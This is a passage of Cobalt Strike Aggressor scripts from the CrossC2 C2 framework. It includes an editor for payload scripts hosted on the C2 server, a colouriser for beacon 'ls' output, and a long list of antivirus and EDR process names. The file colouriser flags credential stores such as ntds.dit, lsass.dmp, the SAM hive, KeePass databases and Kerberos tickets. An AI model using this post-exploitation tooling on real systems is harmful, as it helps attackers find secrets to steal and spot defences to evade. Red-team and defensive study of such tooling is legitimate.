        createScriptEditor();
    }
}



# Collect the URLs of every hosted site whose Description contains "Script".
# Returns %script_site keyed 0..n-1; each value is a one-element array holding the
# URL built as Proto . Host . ':' . Port . URI.
# $script_count and $scriptURL are not declared with local() like the other
# variables, so they are script globals that are reset on every call.
sub getScript {
    local('%script_site');
    local('$Description, $Proto, $Host, $Port, $URI');
    %script_site = %();
    $script_count = 0;
    foreach $site_list(sites()) {
        ($Description, $Proto, $Host, $Port, $URI) = values($site_list, @('Description', 'Proto', 'Host', 'Port', 'URI'));
        if ("Script" isin $Description) {
            $scriptURL = $Proto.$Host.':'.$Port.$URI;
            %script_site[$script_count] = @($scriptURL);
            $script_count += 1;
        }
    }
    return %script_site;
}

# Look up the Description of the hosted "Script" site whose rebuilt URL equals $1.
# Returns '' when no site matches; if several match, the last one enumerated wins.
sub getScriptDesc {
    local('$site_url $desc');
    local('$Description, $Proto, $Host, $Port, $URI');
    $site_url = $1;
    $desc = '';
    foreach $site_list(sites()) {
        ($Description, $Proto, $Host, $Port, $URI) = values($site_list, @('Description', 'Proto', 'Host', 'Port', 'URI'));
        if ("Script" isin $Description) {
            $scriptURL = $Proto.$Host.':'.$Port.$URI;
            if ($scriptURL eq $site_url) {
                $desc = $Description;
            }
        }
    }
    return $desc;
}

# Callback of the "Edit Script Content" dialog.
#   $2 = the button that was pressed; only "UPDATE !" does anything
#   $3 = dialog values: scheme, host, port, uri, script_content, desc
# On update the existing site at port/uri is killed and re-hosted with the edited
# content (the last site_host argument selects https).
sub updateScriptCallback {
    local('$action_type $scheme $host $port $uri $script_content $desc');
    $action_type = $2;
    if ($action_type eq "UPDATE !") {
$scheme = $3['scheme']; 49 | $host = $3['host']; 50 | $port = $3['port']; 51 | $uri = $3['uri']; 52 | $script_content = $3['script_content']; 53 | $desc = $3['desc']; 54 | if ($scheme eq 'http') { 55 | site_kill($port, '/'.$uri); 56 | site_host($host, $port, '/'.$uri, $script_content, 'automatic', $desc, false); 57 | } else if ($scheme eq 'https') { 58 | site_kill($port, '/'.$uri); 59 | site_host($host, $port, '/'.$uri, $script_content, 'automatic', $desc, true); 60 | } 61 | } 62 | } 63 | 64 | sub createScriptEditorCallback { 65 | local('$action_type $script_url $scheme $host $port $uri $desc $host_and_port $host_and_uri $script_content'); 66 | $action_type = $2; 67 | println($action_type); 68 | if ($action_type eq "edit") { 69 | $script_url = $3['script_url']; 70 | if ($script_url) { 71 | $script_content = httpRequest("GET", $script_url, ""); 72 | println($script_content); 73 | if ($script_content) { 74 | $desc = getScriptDesc($script_url); 75 | $host = ''; 76 | $port = ''; 77 | ($scheme, $host_and_uri) = split('://', $script_url); 78 | ($host_and_port, $uri) = split('/', $host_and_uri); 79 | if (':' isin $host_and_port) { 80 | ($host, $port) = split(':', $host_and_port); 81 | } 82 | if ($scheme && $host && $port && $uri && $desc) { 83 | $dialog = dialog("Edit Script Content", %(scheme => $scheme, host => $host, port => $port, uri => $uri, desc => $desc, script_content => $script_content), &updateScriptCallback); 84 | dialog_description($dialog, "script editor"); 85 | drow_text($dialog, "scheme", "scheme: "); 86 | drow_text($dialog, "host", "host: "); 87 | drow_text($dialog, "port", "port: "); 88 | drow_text($dialog, "uri", "uri: "); 89 | drow_text($dialog, "desc", "desc: "); 90 | drow_text_big($dialog, "script_content", "Script Content: "); 91 | dbutton_action($dialog, "UPDATE !"); 92 | dbutton_action($dialog, "cancel"); 93 | dialog_show($dialog); 94 | } 95 | } 96 | } 97 | } 98 | } 99 | 100 | sub createScriptEditor { 101 | local('@scriptMenu %scriptMap'); 102 | 
@scriptMenu = @(); 103 | 104 | %scriptMap = getScript(); 105 | foreach $key => $value (%scriptMap) { 106 | add(@scriptMenu, $value[0]); 107 | } 108 | 109 | $dialog = dialog("Edit script", %(script_url => "", scriptMap => %scriptMap), &createScriptEditorCallback); 110 | dialog_description($dialog, "script editor"); 111 | drow_combobox($dialog, "script_url", "CrossC2 Script: ", @scriptMenu); 112 | dbutton_action($dialog, "edit"); 113 | dbutton_action($dialog, "cancel"); 114 | dialog_show($dialog); 115 | } 116 | -------------------------------------------------------------------------------- /utils/cc2FilesColor.cna: -------------------------------------------------------------------------------- 1 | # 2 | # Color Coded Files Listing for CrossC2. 3 | # 4 | # A nice script that colorizes your `ls` output and keeps track of uploaded files 5 | # to let you highlight them. 6 | # 7 | # Be wary of additional performance hit when listing big directories imposed by 8 | # their listing processing, coloring and sorting that this script does. 9 | # 10 | # Based on the original FilesColor.cna by @mgeeky. (https://github.com/mgeeky/cobalt-arsenal/blob/master/FilesColor.cna) 11 | # 12 | # Author: 13 | # hooooooooooook 14 | # (https://github.com/gloxec/CrossC2) 15 | # 16 | 17 | 18 | global('@UPLOADED_FILE_NAMES $TIMES_TO_DISPLAY_COLORS_SCHEME $MAX_OUTPUT_SIZE_TO_COLORIZE'); 19 | 20 | @UPLOADED_FILE_NAMES = @(); 21 | $TIMES_TO_DISPLAY_COLORS_SCHEME = 3; 22 | 23 | # If files listing output is going to be longer than the below threshold, avoid processing 24 | # that output to return results faster 25 | $MAX_OUTPUT_SIZE_TO_COLORIZE = 65536; 26 | 27 | sub interpretSize { 28 | local('$s $size'); 29 | $s = 0L; 30 | $s = long($1); 31 | 32 | if($s == 0) { 33 | $size = ""; 34 | } 35 | else if($s < 1024L) { 36 | $size .= long($s) . 
"B"; 37 | } 38 | else if($s < long(1024L * 1024L)) { 39 | $size = long(round($s / 1024.0, 1)); 40 | $size .= "KB"; 41 | } 42 | else if($s < long(1024L * 1024L * 1024L)) { 43 | $size = long(round(($s / 1024.0) / 1024, 1)); 44 | $size .= "MB"; 45 | } 46 | else if($s < long(1024L * 1024L * 1024L * 1024L)) { 47 | $size = long(round((($s / 1024.0) / 1024) / 1024, 1)); 48 | $size .= "GB"; 49 | } 50 | 51 | return $size; 52 | } 53 | 54 | sub format_ls{ 55 | # $1 = beacon ID, $2 = the folder, $3 = results 56 | $bid = $1; 57 | $res = $3; 58 | blog($bid, "format ls: ".$2); 59 | local('$totalsize @subl $outls $temp $size $s $ext $dotpos $type $lastmod $name @lines @ls'); 60 | this('$once'); 61 | 62 | if(strlen($res) > $MAX_OUTPUT_SIZE_TO_COLORIZE) { 63 | return $res; 64 | } 65 | 66 | @lines = split("\n", ["$res" trim]); 67 | 68 | @configuration = @('config', 'conf', 'json', 'yml', 'xml', 'inf', 'properties', 'settings'); 69 | @sensitive = @('ost', 'dmp', 'sqlite', 'sqlite3', 'db', 'kdbx', 'kdb', 'dit', 'kirbi', 'ccache', 'kirbis', 'git'); 70 | @sensitive_files = @('ntds.dit', 'lsass.dmp', 'sam', 'system', 'security'); 71 | @archives = @('rar', 'zip', '7z', 'tar', 'gz', 'bz2', 'iso'); 72 | @exes = @('msi', 'sys', 'exe', 'dll', 'bat', 'sct', 'so', 'sh'); 73 | @docs = @('csv', 'odt', 'dotx', 'dotm', 'docm', 'xlam', 'xll', 'xlm', 'xlsm', 'xltx', 'msg', 'rtf', 'txt', 'pdf', 'docx', 'doc', 'xls', 'xlsx', 'ppt', 'pptx', 'pptm', 'odp', 'ppsm', 'ppa', 'ppam'); 74 | @sources = @('cpp', 'md', 'h', 'hpp', 'c', 'pl', 'sql', 'php', 'py', 'java', 'rb', 75 | 'html', 'js', 'css', 'asp', 'aspx', 'cs', 'vbs', 'vbe', 'jse', 'ps1', 'sln', 'vcxproj', 'csproj', 'gitignore', 'gitmodules', 'gitattributes'); 76 | 77 | 78 | if($once < $TIMES_TO_DISPLAY_COLORS_SCHEME) { 79 | $outls .= "\cC[*]\o Colors scheme:\n"; 80 | $outls .= "\cC[*]\o ---------------------------\n"; 81 | $outls .= "\cC[*]\o Directories: \c8 YELLOW \o\n"; 82 | $outls .= "\cC[*]\o Cobalt Strike Uploaded Files: \cBBLUE\o\n"; 83 | $outls 
.= "\cC[*]\o Sensitive files: \c4 RED \o\n"; 84 | $outls .= "\cC[*]\o Configuration files: \c3 DARK GREEN \o\n"; 85 | $outls .= "\cC[*]\o Archives: \c7 ORANGE \o\n"; 86 | $outls .= "\cC[*]\o Source codes: \cC DARK BLUE \o\n"; 87 | $outls .= "\cC[*]\o Executables: \cD MAGENTA \o\n"; 88 | $outls .= "\cC[*]\o Documents: \c9 GREEN \o\n"; 89 | $once += 1; 90 | } 91 | 92 | $outls .= "\c9[+]\o Location: \cC" . @lines[0] . "\o\n\n"; 93 | $outls .= " Size Type Last Modified Name\n"; 94 | $outls .= " ---- ---- ------------------- ----\n"; 95 | 96 | @subl = sublist(@lines, 1); 97 | $totalsize = 0L; 98 | 99 | foreach $temp (@subl) { 100 | ($type, $s, $lastmod, $name) = split("\t", $temp); 101 | 102 | if ($name eq "." || $name eq "..") { 103 | continue; 104 | } 105 | 106 | if($type eq "D") { $type = "dir"; } 107 | else if($type eq "F") { $type = "file"; } 108 | 109 | $s = long($s); 110 | $totalsize += $s; 111 | 112 | $size = interpretSize($s); 113 | $dotpos = lindexOf($name, '.'); 114 | $ext = ""; 115 | if(($dotpos) ) { 116 | $ext = lc(substr($name, $dotpos + 1)); 117 | } 118 | 119 | if($type eq "dir") { 120 | # Directories in YELLOW 121 | push(@ls, %(type => $type, name => $name, entry => "\c8 $[10]size $[7]type\o $[21]lastmod\c8 $name \o")); 122 | } 123 | else if($name in @UPLOADED_FILE_NAMES) { 124 | # Uploaded Files through Cobalt Strike (the ones we still keep track off) in Blue 125 | push(@ls, %(type => $type, name => $name, entry => "\cB $[10]size $[7]type\o $[21]lastmod\cB $name $+ \o")); 126 | } 127 | else if(($ext in @sensitive) || (lc($name) in @sensitive_files)) { 128 | # Sensitive files in Red 129 | push(@ls, %(type => $type, name => $name, entry => "\c4 $[10]size $[7]type\o $[21]lastmod\c4 $name \o")); 130 | } 131 | else if($ext in @exes) { 132 | # Executables in Magenta 133 | push(@ls, %(type => $type, name => $name, entry => "\cD $[10]size $[7]type\o $[21]lastmod\cD $name \o")); 134 | } 135 | else if($ext in @interesting) { 136 | # Configuration files in Dark 
Green 137 | push(@ls, %(type => $type, name => $name, entry => "\c3 $[10]size $[7]type\o $[21]lastmod\c3 $name \o")); 138 | } 139 | else if($ext in @sources) { 140 | # Source codes in Dark Blue 141 | push(@ls, %(type => $type, name => $name, entry => "\cC $[10]size $[7]type\o $[21]lastmod\cC $name \o")); 142 | } 143 | else if($ext in @archives) { 144 | # Archives in Orange 145 | push(@ls, %(type => $type, name => $name, entry => "\c7 $[10]size $[7]type\o $[21]lastmod\c7 $name \o")); 146 | } 147 | else if($ext in @docs) { 148 | # Documents in Green 149 | push(@ls, %(type => $type, name => $name, entry => "\c9 $[10]size $[7]type\o $[21]lastmod\c9 $name \o")); 150 | } 151 | else { 152 | push(@ls, %(type => $type, name => $name, entry => " $[10]size $[7]type $[21]lastmod $name \o")); 153 | } 154 | } 155 | 156 | sort({ return ($1['type'] cmp $2['type']); }, @ls); 157 | 158 | foreach $temp (@ls) { 159 | $outls .= $temp['entry'] . "\n"; 160 | } 161 | 162 | $totalsize = interpretSize($totalsize); 163 | $outls .= "\nFiles and dirs count: " . size(@ls) . ", total size of files: $totalsize (output len: " . strlen($res) . ")\n"; 164 | blog($bid, $outls); 165 | } 166 | 167 | 168 | ssh_alias ls { 169 | if(!$2){ 170 | bls($1, "./", &format_ls); 171 | } else { 172 | bls($1, $2, &format_ls); 173 | } 174 | } -------------------------------------------------------------------------------- /utils/cc2ProcessColor.cna: -------------------------------------------------------------------------------- 1 | 2 | # Color Coded Process Listing for CrossC2. 3 | # 4 | # Takes the PS output in CS and color codes all AV processes, explorer process, browsers processes, and current process running 5 | # 6 | # Based on the original ProcessColor.cna by @r3dQu1nn. 
(https://github.com/harleyQu1nn/AggressorScripts/blob/master/ProcessColor.cna) 7 | # 8 | # Author: 9 | # hooooooooooook 10 | # (https://github.com/gloxec/CrossC2) 11 | # 12 | 13 | global('@av @av1 @edr @admin @login @browsers'); 14 | #av 1 15 | @av = @("SecurityHealthService", "Tanium", "360RP", "360SD", "360Safe", "360leakfixer", "360rp", "360safe", "360sd", "360tray", "AAWTray", "ACAAS", "ACAEGMgr", "ACAIS", "AClntUsr", "ALERT", "ALERTSVC", "ALMon", "ALUNotify", "ALUpdate", "ALsvc", "AVENGINE", "AVGCHSVX", "AVGCSRVX", "AVGIDSAgent", "AVGIDSMonitor", "AVGIDSUI", "AVGIDSWatcher", "AVGNSX", "AVKProxy", "AVKService", "AVKTray", "AVKWCtl", "AVP", "AVP", "AVPDTAgt", "AcctMgr", "Ad-Aware", "Ad-Aware2007", "AddressExport", "AdminServer", "Administrator", "AeXAgentUIHost", "AeXNSAgent", "AeXNSRcvSvc", "AlertSvc", "AlogServ", "AluSchedulerSvc", "AnVir", "AppSvc32", "AtrsHost", "Auth8021x", "AvastSvc", "AvastUI", "Avconsol", "AvpM", "Avsynmgr", "Avtask", "BLACKD", "BWMeterConSvc", "CAAntiSpyware", "CALogDump", "CAPPActiveProtection", "CAPPActiveProtection", "CB", "CCAP", "CCenter", "CClaw", "CLPS", "CLPSLA", "CLPSLS", "CNTAoSMgr", "CPntSrv", "CTDataLoad", "CertificationManagerServiceNT", "ClShield", "ClamTray", "ClamWin", "Console", "CylanceUI", "DAO_Log", "DLService", "DLTray", "DLTray", "DRWAGNTD", "DRWAGNUI", "DRWEB32W", "DRWEBSCD", "DRWEBUPW", "DRWINST", "DSMain", "DWHWizrd", "DefWatch", "DolphinCharge", "EHttpSrv", "EMET_Agent", "EMET_Service", "EMLPROUI", "EMLPROXY", "EMLibUpdateAgentNT", "ETConsole3", "ETCorrel", "ETLogAnalyzer", "ETReporter", "ETRssFeeds", "EUQMonitor", "EndPointSecurity", "EngineServer", "EntityMain", "EtScheduler", "EtwControlPanel", "EventParser", "FAMEH32", "FCDBLog", "FCH32", "FPAVServer", "FProtTray", "FSCUIF", "FSHDLL32", "FSM32", "FSMA32", "FSMB32", "FWCfg", "FireSvc", "FireTray", "FirewallGUI", "ForceField", "FortiProxy", "FortiTray", "FortiWF", "FrameworkService", "FreeProxy", "GDFirewallTray", "GDFwSvc", "HWAPI", "ISNTSysMonitor", 
"ISSVC", "ISWMGR", "ITMRTSVC", "ITMRT_SupportDiagnostics", "ITMRT_TRACE", "IcePack", "IdsInst", "InoNmSrv", "InoRT", "InoRpc", "InoTask", "InoWeb", "IsntSmtp", "KABackReport", "KANMCMain", "KAVFS", "KAVStart", "KLNAGENT", "KMailMon", "KNUpdateMain", "KPFWSvc", "KSWebShield", "KVMonXP", "KVMonXP_2", "KVSrvXP", "KWSProd", "KWatch", "KavAdapterExe", "KeyPass", "KvXP", "LUALL", "LWDMServer", "LockApp", "LockAppHost", "LogGetor", "MCSHIELD", "MCUI32", "MSASCui", "ManagementAgentNT", "McAfeeDataBackup", "McEPOC", "McEPOCfg", "McNASvc", "McProxy", "McScript_InUse", "McWCE", "McWCECfg", "Mcshield", "Mctray", "MgntSvc", "MpCmdRun", "MpfAgent", "MpfSrv", "MsMpEng", "NAIlgpip", "NAVAPSVC", "NAVAPW32", "NCDaemon", "NIP", "NJeeves", "NLClient", "NMAGENT", "NOD32view", "NPFMSG", "NPROTECT", "NRMENCTB", "NSMdtr", "NTRtScan", "NVCOAS", "NVCSched", "NavShcom", "Navapsvc", "NaveCtrl", "NaveLog", "NaveSP", "Navw32", "Navwnt", "Nip", "Njeeves", "Npfmsg2", "Npfsvice", "NscTop", "Nvcoas", "Nvcsched", "Nymse", "OLFSNT40", "OMSLogManager", "ONLINENT", "ONLNSVC", "OfcPfwSvc", "PASystemTray", "PAVFNSVR", "PAVSRV51", "PNmSrv", "POPROXY", "POProxy", "PPClean", "PPCtlPriv", "PQIBrowser", "PSHost", "PSIMSVC", "PXEMTFTP", "PadFSvr", "Pagent", "Pagentwd", "PavBckPT", "PavFnSvr", "PavPrSrv", "PavProt", "PavReport", "Pavkre", "PcCtlCom", "PcScnSrv", "PccNTMon", "PccNTUpd", "PpPpWallRun", "PrintDevice", "ProUtil", "PsCtrlS", "PsImSvc", "PwdFiltHelp", "Qoeloader", "RAVMOND", "RAVXP", "RNReport", "RPCServ", "RSSensor", "RTVscan", "RapApp", "Rav", "RavAlert", "RavMon", "RavMonD", "RavService", "RavStub", "RavTask", "RavTray", "RavUpdate", "RavXP", "RealMon", "Realmon", "RedirSvc", "RegMech", "ReporterSvc", "RouterNT", "Rtvscan", "SAFeService", "SAService", "SAVAdminService", "SAVFMSESp", "SAVMain", "SAVScan", "SCANMSG", "SCANWSCS", "SCFManager", "SCFService", "SCFTray", "SDTrayApp", "SEVINST", "SMEX_ActiveUpdate", "SMEX_Master", "SMEX_RemoteConf", "SMEX_SystemWatch", "SMSECtrl", "SMSELog", "SMSESJM", 
"SMSESp", "SMSESrv", "SMSETask", "SMSEUI", "SNAC", "SNAC", "SNDMon", "SNDSrvc", "SPBBCSvc", "SPIDERML", "SPIDERNT", "SSM", "SSScheduler", "SVCharge", "SVDealer", "SVFrame", "SVTray", "SWNETSUP", "SavRoam", "SavService", "SavUI", "ScanMailOutLook", "SeAnalyzerTool", "SemSvc", "SescLU", "SetupGUIMngr", "SiteAdv", "Smc", "SmcGui", "SnHwSrv", "SnICheckAdm", "SnIcon", "SnSrv", "SnicheckSrv", "SpIDerAgent", "SpntSvc", "SpyEmergency", "SpyEmergencySrv", "StOPP", "StWatchDog", "SymCorpUI", "SymSPort", "TBMon", "TFGui", "TFService", "TFTray", "TFun", "TIASPN~1", "TSAnSrf", "TSAtiSy", "TScutyNT", "TSmpNT", "TmListen", "TmPfw", "Tmntsrv", "Traflnsp", "TrapTrackerMgr", "UPSCHD", "UcService", "UdaterUI", "UmxAgent", "UmxCfg", "UmxFwHlp", "UmxPol", "Up2date", "UpdaterUI", "UrlLstCk", "UserActivity", "UserAnalysis", "UsrPrmpt", "V3Medic", "V3Svc", "VPC32", "VPDN_LU", "VPTray", "VSStat", "VsStat", "VsTskMgr", "WEBPROXY", "WFXCTL32", "WFXMOD32", "WFXSNT40", "WebProxy", "WebScanX", "WinRoute", "WrSpySetup", "ZLH", "Zanda", "ZhuDongFangYu", "Zlh", "_avp32", "_avpcc", "_avpm", "aAvgApi", "aawservice", "acaif", "acctmgr", "ackwin32", "aclient", "adaware", "advxdwin", "aexnsagent", "aexsvc", "aexswdusr", "aflogvw", "afwServ", "agentsvr", "agentw", "ahnrpt", "ahnsd", "ahnsdsv", "alertsvc", "alevir", "alogserv", "alsvc", "alunotify", "aluschedulersvc", "amon9x", "amswmagt", "anti-trojan", "antiarp", "antivirus", "ants", "aphost", "apimonitor", "aplica32", "aps", "apvxdwin", "arr", "ashAvast", "ashBug", "ashChest", "ashCmd", "ashDisp", "ashEnhcd", "ashLogV", "ashMaiSv", "ashPopWz", "ashQuick", "ashServ", "ashSimp2", "ashSimpl", "ashSkPcc", "ashSkPck", "ashUpd", "ashWebSv", "ashdisp", "ashmaisv", "ashserv", "ashwebsv", "asupport", "aswDisp", "aswRegSvr", "aswServ", "aswUpdSv", "aswUpdsv", "aswWebSv", "aswupdsv", "atcon", "atguard", "atro55en", "atupdater", "atwatch", "atwsctsk", "au", "aupdate", "aupdrun", "aus", "auto-protect.nav80try", "autodown", "autotrace", "autoup", "autoupdate", 
"avEngine", "avadmin", "avcenter", "avconfig", "avconsol", "ave32", "avengine", "avesvc", "avfwsvc", "avgam", "avgamsvr", "avgas", "avgcc", "avgcc32", "avgcsrvx", "avgctrl", "avgdiag", "avgemc", "avgfws8", "avgfws9", "avgfwsrv", "avginet", "avgmsvr", "avgnsx", "avgnt", "avgregcl", "avgrssvc", "avgrsx", "avgscanx", "avgserv", "avgserv9", "avgsystx", "avgtray", "avguard", "avgui", "avgupd", "avgupdln", "avgupsvc", "avgvv", "avgw", "avgwb", "avgwdsvc", "avgwizfw", "avkpop", "avkserv", "avkservice", "avkwctl9", "avltmain", "avmailc", "avmcdlg", "avnotify", "avnt", "avp", "avp32", "avpcc", "avpdos32", "avpexec", "avpm", "avpncc", "avps", "avptc32", "avpupd", "avscan", "avsched32", "avserver", "avshadow", "avsynmgr", "avwebgrd", "avwin", "avwin95", "avwinnt", "avwupd", "avwupd32", "avwupsrv", "avxmonitor9x", "avxmonitornt", "avxquar", "backweb", "bargains", "basfipm", "bd_professional", "bdagent", "bdc", "bdlite", "bdmcon", "bdss", "bdsubmit", "beagle", "belt", "bidef", "bidserver", "bipcp", "bipcpevalsetup", "bisp", "blackd", "blackice", "blink", "blss", "bmrt", "bootconf", "bootwarn", "borg2", "bpc", "bpk", "brasil", "bs120", "bundle", "bvt", "bwgo0000", "ca", "caav", "caavcmdscan", "caavguiscan", "caf", "cafw", "caissdt", "capfaem", "capfasem", "capfsem", "capmuamagt", "casc", "casecuritycenter", "caunst", "cavrep", "cavrid", "cavscan", "cavtray", "ccApp", "ccEvtMgr", "ccLgView", "ccProxy", "ccSetMgr", "ccSetmgr", "ccSvcHst", "ccap", "ccapp", "ccevtmgr", "cclaw", "ccnfagent", "ccprovsp", "ccproxy", "ccpxysvc", "ccschedulersvc", "ccsetmgr", "ccsmagtd", "ccsvchst", "ccsystemreport", "cctray", "ccupdate", "cdp", "cfd", "cfftplugin", "cfgwiz", "cfiadmin", "cfiaudit", "cfinet", "cfinet32", "cfnotsrvd", "cfp", "cfpconfg", "cfpconfig", "cfplogvw", "cfpsbmit", "cfpupdat", "cfsmsmd", "checkup", "cka", "clamscan", "claw95", "claw95cf", "clean", "cleaner", "cleaner3", "cleanpc", "cleanup", "click", "cmdagent", "cmdinstall", "cmesys", "cmgrdian", "cmon016", "comHost", 
"connectionmonitor", "control_panel", "cpd", "cpdclnt", "cpf", "cpf9x206", "cpfnt206", "crashrep", "csacontrol", "csinject", "csinsm32", "csinsmnt", "csrss_tc", "ctrl", "cv", "cwnb181", "cwntdwmo", "cz", "datemanager", "dbserv", "dbsrv9", "dcomx", "defalert", "defscangui", "defwatch", "deloeminfs", "deputy", "diskmon", "divx", "djsnetcn", "dllcache", "dllreg", "doors", "doscan", "dpf", "dpfsetup", "dpps2", "drwagntd", "drwatson", "drweb", "drweb32", "drweb32w", "drweb386", "drwebcgp", "drwebcom", "drwebdc", "drwebmng", "drwebscd", "drwebupw", "drwebwcl", "drwebwin", "drwupgrade", "dsmain", "dssagent", "dvp95", "dvp95_0", "dwengine", "dwhwizrd", "dwwin", "ecengine", "edisk", "efpeadm", "egui", "ekrn", "elogsvc", "emet_agent", "emet_service", "emsw", "engineserver", "ent", "era", "esafe", "escanhnt", "escanv95", "esecagntservice", "esecservice", "esmagent", "espwatch", "etagent", "ethereal", "etrustcipe", "evpn", "evtProcessEcFile", "evtarmgr", "evtmgr", "exantivirus-cnet", "exe.avxw", "execstat", "expert", "explore", "f-agnt95", "f-prot", "f-prot95", "f-stopw", "fameh32", "fast", "fch32", "fih32", "findviru", "firesvc", "firetray", "firewall", "fmon", "fnrb32", "fortifw", "fp-win", "fp-win_trial", "fprot", "frameworkservice", "frminst", "frw", "fsaa", "fsaua", "fsav", "fsav32", "fsav530stbyb", "fsav530wtbyb", "fsav95", "fsavgui", "fscuif", "fsdfwd", "fsgk32", "fsgk32st", "fsguidll", "fsguiexe", "fshdll32", "fsm32", "fsma32", "fsmb32", "fsorsp", "fspc", "fspex", "fsqh", "fssm32", "fwinst", "gator", "gbmenu", "gbpoll", "gcascleaner", "gcasdtserv", "gcasinstallhelper", "gcasnotice", "gcasserv", "gcasservalert", "gcasswupdater", "generics", "gfireporterservice", "ghost_2", "ghosttray", "giantantispywaremain", "giantantispywareupdater", "gmt", "guard", "guarddog", "guardgui", "hacktracersetup", "hbinst", "hbsrv", "hipsvc", "hotactio", "hotpatch", "htlog", "htpatch", "hwpe", "hxdl", "hxiul", "iamapp", "iamserv", "iamstats", "ibmasn", "ibmavsp", "icepack", "icload95", 
"icloadnt", "icmon", "icsupp95", "icsuppnt", "idle", "iedll", "iedriver", "iface", "ifw2000", "igateway", "inetlnfo", "infus", "infwin", "inicio", "inonmsrv", "inorpc", "inort", "inotask", "intdel", "intren", "iomon98", "isPwdSvc", "isUAC", "isafe", "isafinst", "issvc", "istsvc", "jammer", "jdbgmrg", "jedi", "kaccore", "kansgui", "kansvr", "kastray", "kav", "kav32", "kavfs", "kavfsgt", "kavfsrcn", "kavfsscs", "kavfswp", "kavisarv", "kavlite40eng", "kavlotsingleton", "kavmm", "kavpers40eng", "kavpf", "kavshell", "kavss", "kavstart", "kavsvc", "kavtray", "kazza", "keenvalue", "kerio-pf-213-en-win", "kerio-wrl-421-en-win", "kerio-wrp-421-en-win", "kernel32", "killprocesssetup161", "kis", "kislive", "kissvc", "klnacserver", "klnagent", "klserver", "klswd", "klwtblfs", "kmailmon", "knownsvr", "kpf4gui", "kpf4ss", "kpfw32", "kpfwsvc", "krbcc32s", "kvdetech", "kvolself", "kvsrvxp", "kvsrvxp_1", "kwatch", "kwsprod", "kxeserv", "launcher", "ldnetmon", "ldpro", "ldpromenu", "ldscan", "leventmgr", "livesrv", "lmon", "lnetinfo", "loader", "localnet", "lockdown", "lockdown2000", "log_qtine", "lookout", "lordpe", "lsetup", "luall", "luau", "lucallbackproxy", "lucoms", "lucomserver", "lucoms~1", "luinit", "luspt", "makereport", "mantispm", "mapisvc32", "masalert", "massrv", "mcafeefire", "mcagent", "mcappins", "mcconsol", "mcdash", "mcdetect", "mcepoc", "mcepocfg", "mcinfo", "mcmnhdlr", "mcmscsvc", "mcods", "mcpalmcfg", "mcpromgr", "mcregwiz", "mcscript", "mcscript_inuse", "mcshell", "mcshield", "mcshld9x", "mcsysmon", "mctool", "mctray", "mctskshd", "mcuimgr", "mcupdate", "mcupdmgr", "mcvsftsn", "mcvsrte", "mcvsshld", "mcwce", "mcwcecfg", "md", "mfeann", "mfevtps", "mfin32", "mfw2en", "mfweng3.02d30", "mgavrtcl", "mgavrte", "mghtml", "mgui", "minilog", "mmod", "monitor", "monsvcnt", "monsysnt", "moolive", "mostat", "mpcmdrun", "mpf", "mpfagent", "mpfconsole", "mpfservice", "mpftray", "mps", "mpsevh", "mpsvc", "mrf", "mrflux", "msapp", "msascui", "msbb", "msblast", "mscache", 
"msccn32", "mscifapp", "mscman", "msconfig", "msdm", "msdos", "msiexec16", "mskagent", "mskdetct", "msksrver", "msksrvr", "mslaugh", "msmgt", "msmpeng", "msmsgri32", "msscli", "msseces", "mssmmc32", "msssrv", "mssys", "msvxd", "mu0311ad", "mwatch", "myagttry", "n32scanw", "nSMDemf", "nSMDmon", "nSMDreal", "nSMDsch", "naPrdMgr", "nav", "navap.navapsvc", "navapsvc", "navapw32", "navdx", "navlu32", "navnt", "navstub", "navw32", "navwnt", "nc2000", "ncinst4"); 16 | 17 | #av 2 18 | @av1 = @("MSASCuiL", "CylanceSvc", "ndd32", "ndetect", "neomonitor", "neotrace", "neowatchlog", "netalertclient", "netarmor", "netcfg", "netd32", "netinfo", "netmon", "netscanpro", "netspyhunter-1.2", "netstat", "netutils", "networx", "ngctw32", "ngserver", "nip", "nipsvc", "nisoptui", "nisserv", "nisum", "njeeves", "nlsvc", "nmain", "nod32", "nod32krn", "nod32kui", "normist", "norton_internet_secu_3.0_407", "notstart", "npf40_tw_98_nt_me_2k", "npfmessenger", "npfmntor", "npfmsg", "nprotect", "npscheck", "npssvc", "nrmenctb", "nsched32", "nscsrvce", "nsctop", "nsmdtr", "nssys32", "nstask32", "nsupdate", "nt", "ntcaagent", "ntcadaemon", "ntcaservice", "ntrtscan", "ntvdm", "ntxconfig", "nui", "nupgrade", "nvarch16", "nvc95", "nvcoas", "nvcsched", "nvsvc32", "nwinst4", "nwservice", "nwtool16", "nymse", "oasclnt", "oespamtest", "ofcdog", "ofcpfwsvc", "okclient", "olfsnt40", "ollydbg", "onsrvr", "op_viewer", "opscan", "optimize", "ostronet", "otfix", "outpost", "outpostinstall", "outpostproinstall", "paamsrv", "padmin", "pagent", "pagentwd", "panixk", "patch", "pavbckpt", "pavcl", "pavfires", "pavfnsvr", "pavjobs", "pavkre", "pavmail", "pavprot", "pavproxy", "pavprsrv", "pavsched", "pavsrv50", "pavsrv51", "pavsrv52", "pavupg", "pavw", "pccNT", "pccclient", "pccguide", "pcclient", "pccnt", "pccntmon", "pccntupd", "pccpfw", "pcctlcom", "pccwin98", "pcfwallicon", "pcip10117_0", "pcscan", "pctsAuxs", "pctsGui", "pctsSvc", "pctsTray", "pdsetup", "pep", "periscope", "persfw", "perswf", "pf2", 
"pfwadmin", "pgmonitr", "pingscan", "platin", "pmon", "pnmsrv", "pntiomon", "pop3pack", "pop3trap", "poproxy", "popscan", "portdetective", "portmonitor", "powerscan", "ppinupdt", "ppmcativedetection", "pptbc", "ppvstop", "pqibrowser", "pqv2isvc", "prevsrv", "prizesurfer", "prmt", "prmvr", "programauditor", "proport", "protectx", "psctris", "psh_svc", "psimreal", "psimsvc", "pskmssvc", "pspf", "purge", "pview", "pviewer", "pxemtftp", "pxeservice", "qclean", "qconsole", "qdcsfs", "qoeloader", "qserver", "rapapp", "rapuisvc", "ras", "rasupd", "rav7", "rav7win", "rav8win32eng", "ravmon", "ravmond", "ravstub", "ravxp", "ray", "rb32", "rcsvcmon", "rcsync", "realmon", "reged", "remupd", "reportsvc", "rescue", "rescue32", "rfwmain", "rfwproxy", "rfwsrv", "rfwstub", "rnav", "rrguard", "rshell", "rsnetsvr", "rstray", "rtvscan", "rtvscn95", "rulaunch", "saHookMain", "safeboxtray", "safeweb", "sahagentscan32", "sav32cli", "save", "savenow", "savroam", "savscan", "savservice", "sbserv", "scam32", "scan32", "scan95", "scanexplicit", "scanfrm", "scanmailoutlook", "scanpm", "schdsrvc", "schupd", "scrscan", "seestat", "serv95", "setloadorder", "setup_flowprotector_us", "setupguimngr", "setupvameeval", "sfc", "sgssfw32", "shellspyinstall", "shn", 